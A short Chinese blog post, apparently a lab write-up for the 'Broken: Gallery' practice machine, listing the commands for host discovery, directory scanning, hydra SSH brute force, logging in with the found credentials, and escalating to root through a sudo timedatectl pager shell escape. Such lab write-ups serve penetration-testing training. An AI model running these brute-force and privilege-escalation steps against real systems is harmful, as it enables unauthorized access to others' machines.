Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
Name_NaN_None14 小时前
Linux 使用 Remmina 连接 Windows 远程桌面 ——「小白教程」
linux·网络·电脑·远程工作
2401_8657213315 小时前
WEB 学习框架搭建
网络·学习·web
LlNingyu15 小时前
文艺复兴, 什么是XSS,常见形式(三)
网络·安全·xss
123过去15 小时前
reaver使用教程
linux·网络·测试工具·智能路由器
Honeyeagle16 小时前
无线移动在线复合式多合一气体检测仪:工业安全监测的革新利器
运维·网络·安全
桌面运维家16 小时前
网络运维:防火墙异常流量监控与安全配置优化
运维·网络·安全
xiaoxiaoxiaolll16 小时前
Nature Communications |石墨烯“解锁”亚太赫兹通信:3Gbit/s高速传输背后的器件创新
网络·人工智能
F1FJJ16 小时前
Shield CLI 的 PostgreSQL 插件 v0.4.0 已发布:支持 ER 图设计表关系,还能多人协作
网络·网络协议·postgresql·数据分析·开源软件
9稳16 小时前
基于PLC的生产线自动升降机设计
开发语言·网络·数据库·嵌入式硬件·plc
南湖北漠16 小时前
OPPO手机相册接入了AI功能之后找关闭手机相册图片AI功能入口网络上面的公开答案
网络·计算机网络·其他·智能手机·生活
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南08UV安装并设置国内源09OpenClaw 使用和管理 MCP 完全指南10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)